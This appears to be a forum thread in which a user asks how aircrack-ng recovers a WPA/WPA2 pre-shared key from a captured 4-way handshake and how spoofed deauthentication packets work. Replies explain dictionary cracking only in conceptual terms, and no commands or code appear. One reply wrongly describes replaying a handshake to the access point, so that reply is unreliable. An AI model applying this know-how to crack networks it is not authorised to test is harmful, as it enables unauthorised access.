the key is used for encrypting along with essid and.... the point is with the other variables known, the crack encrypts with them based off a dictionary looking for an ecrypted handshake match. if it finds one, it found your key.
what is the real idea behind cracking WPA/WPA2-PSK with aircrack-ng?
hi guys,
just for educational purpose, i am wondering what is the actual idea behind cracking WPA/WPA2-PSK with aircrack-ng?
ok, i know that we need to capture first the 4-way authentication handshake first in order to crack the PSK. and i also know the whole process how to successful done that to get the key cracked. but here my idea is the actual aircrack-ng technique regarding the key cracking process.
in the tutorial: how to crack WPA/WPA2 on the aircrack-ng website, it is written that 4-way handshake packets is captured and used to break the pre-shared key PSK. but as far as i know, in the 4-way handshake process, the actual PSK key is not shared between the client and the access point AP. the only information shared between the client and the AP are ANonce, SNonce+MIC, Ack, etc... but not the PSK itself. PSK is shared between the client and the AP BEFORE the 4-way handshake.
here is the source of my reference for more idea about 4-way handshake and PSK. http://www.airtightnetworks.com/home...er/80211i.html
Thus my question is how does the aircrack-ng process the PSK through the 4-way handshake even though the PSK itself is not included inside the handshake? or may be i got the total wrong idea for all... And again this is only for educational purpose to know more about the WPA/WPA2 cracking process.
And my second thought is, although i know how to deauthenticate the victim client to force the authentication process in BT5, how would my wireless station let the victim client knows that it is no longer associated with the AP? is that by injecting the spoofed deauthentication packet, as if the deauth packet is sent from the AP, meaning spoofing the sending address in the deauth packet as AP and the destination address be the victim client?
thx alot ......
cheers
Re: what is the real idea behind cracking WPA/WPA2-PSK with aircrack-ng?
the key is used for encrypting along with essid and.... the point is with the other variables known, the crack encrypts with them based off a dictionary looking for an ecrypted handshake match. if it finds one, it found your key.
Re: what is the real idea behind cracking WPA/WPA2-PSK with aircrack-ng?
You capture original handshake, then you trying to imitate that handshake, once you done, you go to that AP again and give him that same handshake, AP thinks, -"Oh..it's you again". smth like tht lol.
I think you don't have to capture it either, just brutforce it on place, but the problem is lack of resources (notebook) and tools. This is why you have to capture it, so you going home where pyrit holds terabytes of hashes and CUDA does it 10 times faster.
Re: what is the real idea behind cracking WPA/WPA2-PSK with aircrack-ng?
Reading the documentation on the aircrack-ng website will answer your questions. As this has been widely covered for years there is no more need to redo it here.
To be successful here you should read all of the following.
ForumRules
ForumFAQ
If you are new to Back|Track
Back|Track Wiki
Failure to do so will probably get your threads deleted or worse.
Posting Permissions